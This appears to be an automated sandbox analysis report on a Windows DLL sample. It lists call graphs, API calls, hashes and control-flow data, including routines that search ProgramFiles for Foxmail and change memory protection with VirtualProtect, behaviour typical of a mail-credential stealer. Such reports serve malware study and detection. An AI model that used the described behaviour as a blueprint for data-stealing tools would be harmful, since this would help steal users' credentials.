10002ada _ValidateLocalCookies 5 API calls 5999->6000 6001 10005bc8 6000->6001 6001->5962 6001->5969 6013 10005914 6002->6013 6011 10005c71 6007->6011 6012 10005c75 __crt_fast_encode_pointer 6007->6012 6008 10005c95 6010 10005ca1 GetProcAddress 6008->6010 6008->6012 6009 10005ce1 __dosmaperr LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 6009->6011 6010->6012 6011->6008 6011->6009 6011->6012 6012->5977 6014 10005854 __dosmaperr RtlEnterCriticalSection RtlLeaveCriticalSection 6013->6014 6015 10005938 6014->6015 6016 100058c4 6015->6016 6017 10005758 __dosmaperr 20 API calls 6016->6017 6018 100058e8 6017->6018 6018->5973 6020 10001ca6 _strlen 6019->6020 6020->5915 7019 100020db 7020 100020e7 ___scrt_is_nonwritable_in_current_image 7019->7020 7021 10002110 dllmain_raw 7020->7021 7025 1000210b 7020->7025 7031 100020f6 7020->7031 7022 1000212a 7021->7022 7021->7031 7032 10001eec 7022->7032 7024 10002177 7026 10001eec 31 API calls 7024->7026 7024->7031 7025->7024 7028 10001eec 31 API calls 7025->7028 7025->7031 7027 1000218a 7026->7027 7029 10002193 dllmain_raw 7027->7029 7027->7031 7030 1000216d dllmain_raw 7028->7030 7029->7031 7030->7024 7033 10001ef7 7032->7033 7034 10001f2a dllmain_crt_process_detach 7032->7034 7035 10001f1c dllmain_crt_process_attach 7033->7035 7036 10001efc 7033->7036 7040 10001f06 7034->7040 7035->7040 7037 10001f12 7036->7037 7038 10001f01 7036->7038 7047 100023ec 7037->7047 7038->7040 7042 1000240b 7038->7042 7040->7025 7055 100053e5 7042->7055 7153 10003513 7047->7153 7050 100023f5 7050->7040 7053 10002408 7053->7040 7054 1000351e 7 API calls 7054->7050 7061 10005aca 7055->7061 7058 1000351e 7137 10003820 7058->7137 7060 10002415 7060->7040 7062 10005ad4 7061->7062 7063 10002410 7061->7063 7064 10005e08 __dosmaperr 11 API calls 7062->7064 7063->7058 7065 10005adb 7064->7065 7065->7063 7066 10005e5e __dosmaperr 11 API calls 7065->7066 7067 10005aee 7066->7067 7069 100059b5 7067->7069 7070 100059c0 7069->7070 7071 100059d0 7069->7071 7075 100059d6 7070->7075 7071->7063 7074 1000571e _free 20 API calls 7074->7071 7076 100059ef 7075->7076 7077 100059e9 7075->7077 7079 1000571e _free 20 API calls 7076->7079 7078 1000571e _free 20 API calls 7077->7078 7078->7076 7080 100059fb 7079->7080 7081 1000571e _free 20 API calls 7080->7081 7082 10005a06 7081->7082 7083 1000571e _free 20 API calls 7082->7083 7084 10005a11 7083->7084 7085 1000571e _free 20 API calls 7084->7085 7086 10005a1c 7085->7086 7087 1000571e _free 20 API calls 7086->7087 7088 10005a27 7087->7088 7089 1000571e _free 20 API calls 7088->7089 7090 10005a32 7089->7090 7091 1000571e _free 20 API calls 7090->7091 7092 10005a3d 7091->7092 7093 1000571e _free 20 API calls 7092->7093 7094 10005a48 7093->7094 7095 1000571e _free 20 API calls 7094->7095 7096 10005a56 7095->7096 7101 1000589c 7096->7101 7107 100057a8 7101->7107 7103 100058c0 7104 100058ec 7103->7104 7120 10005809 7104->7120 7106 10005910 7106->7074 7108 100057b4 ___scrt_is_nonwritable_in_current_image 7107->7108 7115 10005671 RtlEnterCriticalSection 7108->7115 7111 100057be 7112 1000571e _free 20 API calls 7111->7112 7113 100057e8 7111->7113 7112->7113 7116 100057fd 7113->7116 7114 100057f5 _abort 7114->7103 7115->7111 7119 100056b9 RtlLeaveCriticalSection 7116->7119 7118 10005807 7118->7114 7119->7118 7121 10005815 ___scrt_is_nonwritable_in_current_image 7120->7121 7128 10005671 RtlEnterCriticalSection 7121->7128 7123 1000581f 7129 10005a7f 7123->7129 7125 10005832 7133 10005848 7125->7133 7127 10005840 _abort 7127->7106 7128->7123 7130 10005a8e __dosmaperr 7129->7130 7131 10005ab5 __dosmaperr 7129->7131 7130->7131 7132 10007cc2 __dosmaperr 20 API calls 7130->7132 7131->7125 7132->7131 7136 100056b9 RtlLeaveCriticalSection 7133->7136 7135 10005852 7135->7127 7136->7135 7138 1000382d 7137->7138 7142 1000384b ___vcrt_freefls@4 7137->7142 7139 1000383b 7138->7139 7143 10003b67 7138->7143 7148 10003ba2 7139->7148 7142->7060 7144 10003a82 try_get_function 5 API calls 7143->7144 7145 10003b81 7144->7145 7146 10003b99 TlsGetValue 7145->7146 7147 10003b8d 7145->7147 7146->7147 7147->7139 7149 10003a82 try_get_function 5 API calls 7148->7149 7150 10003bbc 7149->7150 7151 10003bd7 TlsSetValue 7150->7151 7152 10003bcb 7150->7152 7151->7152 7152->7142 7159 10003856 7153->7159 7155 100023f1 7155->7050 7156 100053da 7155->7156 7157 10005b7a __dosmaperr 20 API calls 7156->7157 7158 100023fd 7157->7158 7158->7053 7158->7054 7160 10003862 GetLastError 7159->7160 7161 1000385f 7159->7161 7162 10003b67 ___vcrt_FlsGetValue 6 API calls 7160->7162 7161->7155 7163 10003877 7162->7163 7164 100038dc SetLastError 7163->7164 7165 10003ba2 ___vcrt_FlsSetValue 6 API calls 7163->7165 7170 10003896 7163->7170 7164->7155 7166 10003890 7165->7166 7167 10003ba2 ___vcrt_FlsSetValue 6 API calls 7166->7167 7169 100038b8 7166->7169 7166->7170 7167->7169 7168 10003ba2 ___vcrt_FlsSetValue 6 API calls 7168->7170 7169->7168 7169->7170 7170->7164 7671 10004bdd 7672 10004c08 7671->7672 7673 10004bec 7671->7673 7675 10006d60 51 API calls 7672->7675 7673->7672 7674 10004bf2 7673->7674 7676 10006368 __dosmaperr 20 API calls 7674->7676 7677 10004c0f GetModuleFileNameA 7675->7677 7678 10004bf7 7676->7678 7679 10004c33 7677->7679 7680 100062ac ___std_exception_copy 26 API calls 7678->7680 7694 10004d01 7679->7694 7681 10004c01 7680->7681 7686 10004c72 7689 10004d01 38 API calls 7686->7689 7687 10004c66 7688 10006368 __dosmaperr 20 API calls 7687->7688 7693 10004c6b 7688->7693 7691 10004c88 7689->7691 7690 1000571e _free 20 API calls 7690->7681 7692 1000571e _free 20 API calls 7691->7692 7691->7693 7692->7693 7693->7690 7696 10004d26 7694->7696 7698 10004d86 7696->7698 7706 100070eb 7696->7706 7697 10004c50 7700 10004e76 7697->7700 7698->7697 7699 100070eb 38 API calls 7698->7699 7699->7698 7701 10004e8b 7700->7701 7702 10004c5d 7700->7702 7701->7702 7703 1000637b __dosmaperr 20 API calls 7701->7703 7702->7686 7702->7687 7704 10004eb9 7703->7704 7705 1000571e _free 20 API calls 7704->7705 7705->7702 7709 10007092 7706->7709 7710 100054a7 38 API calls 7709->7710 7711 100070a6 7710->7711 7711->7696 6648 10007260 GetStartupInfoW 6649 10007318 6648->6649 6650 10007286 6648->6650 6650->6649 6651 100072dd GetFileType 6650->6651 6651->6650 7712 1000a1e0 7715 1000a1fe 7712->7715 7714 1000a1f6 7719 1000a203 7715->7719 7716 1000aa53 21 API calls 7718 1000a42f 7716->7718 7717 1000a298 7717->7714 7718->7714 7719->7716 7719->7717 7516 10009d61 7517 10009d81 7516->7517 7520 10009db8 7517->7520 7519 10009dab 7521 10009dbf 7520->7521 7522 10009e20 7521->7522 7523 10009ddf 7521->7523 7524 1000aa17 21 API calls 7522->7524 7525 1000a90e 7522->7525 7523->7525 7527 1000aa17 21 API calls 7523->7527 7526 10009e6e 7524->7526 7525->7519 7526->7519 7528 1000a93e 7527->7528 7528->7519 7529 10006761 7530 100066e6 7529->7530 7531 1000677f 7529->7531 7532 100066f2 7530->7532 7533 100066eb FindClose 7530->7533 7537 100081a0 7531->7537 7535 10002ada _ValidateLocalCookies 5 API calls 7532->7535 7533->7532 7536 10006701 7535->7536 7538 100081d9 7537->7538 7539 100081dd 7538->7539 7550 10008205 7538->7550 7540 10006368 __dosmaperr 20 API calls 7539->7540 7541 100081e2 7540->7541 7543 100062ac ___std_exception_copy 26 API calls 7541->7543 7542 10008529 7544 10002ada _ValidateLocalCookies 5 API calls 7542->7544 7545 100081ed 7543->7545 7546 10008536 7544->7546 7547 10002ada _ValidateLocalCookies 5 API calls 7545->7547 7546->7530 7548 100081f9 7547->7548 7548->7530 7550->7542 7551 100080c0 7550->7551 7554 100080db 7551->7554 7552 10002ada _ValidateLocalCookies 5 API calls 7553 10008152 7552->7553 7553->7550 7554->7552 6652 10006664 6653 10006675 6652->6653 6654 10002ada _ValidateLocalCookies 5 API calls 6653->6654 6655 10006701 6654->6655 6656 1000ac6b 6657 1000ac84 __startOneArgErrorHandling 6656->6657 6658 1000acad __startOneArgErrorHandling 6657->6658 6660 1000b2f0 6657->6660 6661 1000b329 __startOneArgErrorHandling 6660->6661 6663 1000b350 __startOneArgErrorHandling 6661->6663 6671 1000b5c1 6661->6671 6664 1000b393 6663->6664 6665 1000b36e 6663->6665 6684 1000b8b2 6664->6684 6675 1000b8e1 6665->6675 6668 1000b38e __startOneArgErrorHandling 6669 10002ada _ValidateLocalCookies 5 API calls 6668->6669 6670 1000b3b7 6669->6670 6670->6658 6672 1000b5ec __raise_exc 6671->6672 6673 1000b7e5 RaiseException 6672->6673 6674 1000b7fd 6673->6674 6674->6663 6676 1000b8f0 6675->6676 6677 1000b964 __startOneArgErrorHandling 6676->6677 6678 1000b90f __startOneArgErrorHandling 6676->6678 6679 1000b8b2 __startOneArgErrorHandling 20 API calls 6677->6679 6691 100078a3 6678->6691 6683 1000b95d 6679->6683 6682 1000b8b2 __startOneArgErrorHandling 20 API calls 6682->6683 6683->6668 6685 1000b8d4 6684->6685 6686 1000b8bf 6684->6686 6687 10006368 __dosmaperr 20 API calls 6685->6687 6688 1000b8d9 6686->6688 6689 10006368 __dosmaperr 20 API calls 6686->6689 6687->6688 6688->6668 6690 1000b8cc 6689->6690 6690->6668 6693 100078cb 6691->6693 6692 10002ada _ValidateLocalCookies 5 API calls 6694 100078e8 6692->6694 6693->6692 6694->6682 6694->6683 7720 100085eb 7724 1000853a 7720->7724 7721 1000854f 7722 10008554 7721->7722 7723 10006368 __dosmaperr 20 API calls 7721->7723 7725 1000857a 7723->7725 7724->7721 7724->7722 7727 1000858b 7724->7727 7726 100062ac ___std_exception_copy 26 API calls 7725->7726 7726->7722 7727->7722 7728 10006368 __dosmaperr 20 API calls 7727->7728 7728->7725 7729 100065ec 7734 100067bf 7729->7734 7732 1000571e _free 20 API calls 7733 100065ff 7732->7733 7739 100067f4 7734->7739 7737 100065f6 7737->7732 7738 1000571e _free 20 API calls 7738->7737 7740 10006806 7739->7740 7749 100067cd 7739->7749 7741 10006836 7740->7741 7742 1000680b 7740->7742 7741->7749 7750 100071d6 7741->7750 7743 1000637b __dosmaperr 20 API calls 7742->7743 7744 10006814 7743->7744 7746 1000571e _free 20 API calls 7744->7746 7746->7749 7747 10006851 7748 1000571e _free 20 API calls 7747->7748 7748->7749 7749->7737 7749->7738 7751 100071e1 7750->7751 7752 10007209 7751->7752 7753 100071fa 7751->7753 7754 10007218 7752->7754 7759 10008a98 7752->7759 7755 10006368 __dosmaperr 20 API calls 7753->7755 7766 10008acb 7754->7766 7757 100071ff ___scrt_fastfail 7755->7757 7757->7747 7760 10008aa3 7759->7760 7761 10008ab8 RtlSizeHeap 7759->7761 7762 10006368 __dosmaperr 20 API calls 7760->7762 7761->7754 7763 10008aa8 7762->7763 7764 100062ac ___std_exception_copy 26 API calls 7763->7764 7765 10008ab3 7764->7765 7765->7754 7767 10008ae3 7766->7767 7768 10008ad8 7766->7768 7769 10008aeb 7767->7769 7776 10008af4 __dosmaperr 7767->7776 7770 100056d0 21 API calls 7768->7770 7771 1000571e _free 20 API calls 7769->7771 7774 10008ae0 7770->7774 7771->7774 7772 10008af9 7775 10006368 __dosmaperr 20 API calls 7772->7775 7773 10008b1e RtlReAllocateHeap 7773->7774 7773->7776 7774->7757 7775->7774 7776->7772 7776->7773 7777 1000474f __dosmaperr 7 API calls 7776->7777 7777->7776 6695 10008c6e 6698 100056b9 RtlLeaveCriticalSection 6695->6698 6697 10008c79 6698->6697 6699 1000506f 6700 10005081 6699->6700 6702 10005087 6699->6702 6703 10005000 6700->6703 6704 1000502a 6703->6704 6705 1000500d 6703->6705 6704->6702 6706 10005024 6705->6706 6707 1000571e _free 20 API calls 6705->6707 6708 1000571e _free 20 API calls 6706->6708 6707->6705 6708->6704 7555 10003370 7566 10003330 7555->7566 7567 10003342 7566->7567 7568 1000334f 7566->7568 7569 10002ada _ValidateLocalCookies 5 API calls 7567->7569 7569->7568 6709 10009e71 6710 10009e95 6709->6710 6711 10009ee6 6710->6711 6714 10009f71 __startOneArgErrorHandling 6710->6714 6715 10009ef8 6711->6715 6717 1000aa53 6711->6717 6713 1000acad __startOneArgErrorHandling 6714->6713 6716 1000b2f0 21 API calls 6714->6716 6716->6713 6718 1000aa70 RtlDecodePointer 6717->6718 6720 1000aa80 6717->6720 6718->6720 6719 10002ada _ValidateLocalCookies 5 API calls 6722 1000ac67 6719->6722 6721 1000ab0d 6720->6721 6723 1000ab02 6720->6723 6725 1000aab7 6720->6725 6721->6723 6724 10006368 __dosmaperr 20 API calls 6721->6724 6722->6715 6723->6719 6724->6723 6725->6723 6726 10006368 __dosmaperr 20 API calls 6725->6726 6726->6723 6727 10008c72 6728 10008c79 6727->6728 6730 100056b9 RtlLeaveCriticalSection 6727->6730 6730->6728 7782 10005bff 7790 10005d5c 7782->7790 7785 10005b7a __dosmaperr 20 API calls 7786 10005c1b 7785->7786 7787 10005c28 7786->7787 7788 10005c2b 11 API calls 7786->7788 7789 10005c13 7788->7789 7791 10005c45 __dosmaperr 5 API calls 7790->7791 7792 10005d83 7791->7792 7793 10005d9b TlsAlloc 7792->7793 7794 10005d8c 7792->7794 7793->7794 7795 10002ada _ValidateLocalCookies 5 API calls 7794->7795 7796 10005c09 7795->7796 7796->7785 7796->7789

                                                                                                                                                Executed Functions

                                                                                                                                                Function 100010F1 Relevance: 12.1, APIs: 8, Instructions: 88stringfileCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                                                                • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                                                                • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                                                                • FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1083526818-0
                                                                                                                                                • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                                                                                • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                                                                                                                                                • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                                                                                • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6
                                                                                                                                                Function 100012EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243stringCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                                                                                                                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                                                                  • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
                                                                                                                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                                                                  • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                                                                  • Part of subcall function 100010F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                                                                                                                  • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 100014C5
                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 100014E0
                                                                                                                                                • lstrlenW.KERNEL32(?,?), ref: 1000150F
                                                                                                                                                • lstrcatW.KERNEL32(00000000), ref: 10001521
                                                                                                                                                • lstrlenW.KERNEL32(?,?), ref: 10001547
                                                                                                                                                • lstrcatW.KERNEL32(00000000), ref: 10001553
                                                                                                                                                • lstrlenW.KERNEL32(?,?), ref: 10001579
                                                                                                                                                • lstrcatW.KERNEL32(00000000), ref: 10001585
                                                                                                                                                • lstrlenW.KERNEL32(?,?), ref: 100015AB
                                                                                                                                                • lstrcatW.KERNEL32(00000000), ref: 100015B7
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                                                • String ID: )$Foxmail$ProgramFiles
                                                                                                                                                • API String ID: 672098462-2938083778
                                                                                                                                                • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                                                                                • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                                                                                                                                                • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                                                                                • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95
                                                                                                                                                Function 1000C7E6 Relevance: 9.1, APIs: 6, Instructions: 65libraryloaderCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                                                                • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                                                                                  • Part of subcall function 1000C803: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                                                                                                  • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                                  • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2099061454-0
                                                                                                                                                • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                                                                                                                                                • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE
                                                                                                                                                Function 1000C7A7 Relevance: 7.6, APIs: 5, Instructions: 100libraryloaderCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 79 1000c7a7-1000c7bc 80 1000c82d 79->80 81 1000c7be-1000c7c6 79->81 83 1000c82f-1000c833 80->83 81->80 82 1000c7c8-1000c7f6 call 1000c7e6 81->82 91 1000c7f8 82->91 92 1000c86c-1000c86e 82->92 85 1000c872 call 1000c877 83->85 86 1000c835-1000c83d GetModuleHandleA 83->86 89 1000c83f-1000c847 86->89 89->89 90 1000c849-1000c84c 89->90 90->83 93 1000c84e-1000c850 90->93 94 1000c7fa-1000c7fe 91->94 95 1000c85b-1000c85e 91->95 96 1000c870 92->96 97 1000c866-1000c86b 92->97 98 1000c852-1000c854 93->98 99 1000c856-1000c85a 93->99 102 1000c865 94->102 103 1000c800-1000c80b GetProcAddress 94->103 100 1000c85f-1000c860 GetProcAddress 95->100 96->90 97->92 98->100 99->95 100->102 102->97 103->80 104 1000c80d-1000c81a VirtualProtect 103->104 105 1000c82c 104->105 106 1000c81c-1000c82a VirtualProtect 104->106 105->80 106->105
                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                                                                                  • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                                                                  • Part of subcall function 1000C7E6: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                                                                                                  • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                                  • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2099061454-0
                                                                                                                                                • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                • Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
                                                                                                                                                • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                • Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE
                                                                                                                                                Function 1000C803 Relevance: 7.6, APIs: 5, Instructions: 54librarymemoryloaderCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 107 1000c803-1000c80b GetProcAddress 108 1000c82d 107->108 109 1000c80d-1000c81a VirtualProtect 107->109 112 1000c82f-1000c833 108->112 110 1000c82c 109->110 111 1000c81c-1000c82a VirtualProtect 109->111 110->108 111->110 113 1000c872 call 1000c877 112->113 114 1000c835-1000c83d GetModuleHandleA 112->114 116 1000c83f-1000c847 114->116 116->116 117 1000c849-1000c84c 116->117 117->112 118 1000c84e-1000c850 117->118 119 1000c852-1000c854 118->119 120 1000c856-1000c85e 118->120 122 1000c85f-1000c865 GetProcAddress 119->122 120->122 124 1000c866-1000c86e 122->124 126 1000c870 124->126 126->117
                                                                                                                                                APIs
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                                                                                                • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                                • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                                • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2910615410.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 0000000E.00000002.2910595697.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 0000000E.00000002.2910615410.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_10000000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2152742572-0
                                                                                                                                                • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                • Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
                                                                                                                                                • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                • Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE

                                                                                                                                                Non-executed Functions

                                                                                                                                                Function 1000173A Relevance: 30.0, APIs: 5, Strings: 12, Instructions: 210COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 136 1000173a-100017fe call 1000c030 call 10002c40 * 2 143 10001803 call 10001cca 136->143 144 10001808-1000180c 143->144 145 10001812-10001816 144->145 146 100019ad-100019b1 144->146 145->146 147 1000181c-10001837 call 10001ede 145->147 150 1000183d-10001845 147->150 151 1000199f-100019ac call 10001ee7 * 2 147->151 152 10001982-10001985 150->152 153 1000184b-1000184e 150->153 151->146 157 10001995-10001999 152->157 158 10001987 152->158 153->152 155 10001854-10001881 call 100044b0 * 2 call 10001db7 153->155 170 10001887-1000189f call 100044b0 call 10001db7 155->170 171 1000193d-10001943 155->171 157->150 157->151 161 1000198a-1000198d call 10002c40 158->161 165 10001992 161->165 165->157 170->171 187 100018a5-100018a8 170->187 172 10001945-10001947 171->172 173 1000197e-10001980 171->173 172->173 175 10001949-1000194b 172->175 173->161 177 10001961-1000197c call 100016aa 175->177 178 1000194d-1000194f 175->178 177->165 180 10001951-10001953 178->180 181 10001955-10001957 178->181 180->177 180->181 184 10001959-1000195b 181->184 185 1000195d-1000195f 181->185 184->177 184->185 185->173 185->177 188 100018c4-100018dc call 100044b0 call 10001db7 187->188 189 100018aa-100018c2 call 100044b0 call 10001db7 187->189 188->157 198 100018e2-1000193b call 100016aa call 100015da call 10002c40 * 2 188->198 189->188 189->198 198->157
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 10001CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                                                                                                                                  • Part of subcall function 10001CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                                                                                                                                  • Part of subcall function 10001CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                                                                                                                                • _strlen.LIBCMT ref: 10001855
                                                                                                                                                • _strlen.LIBCMT ref: 10001869
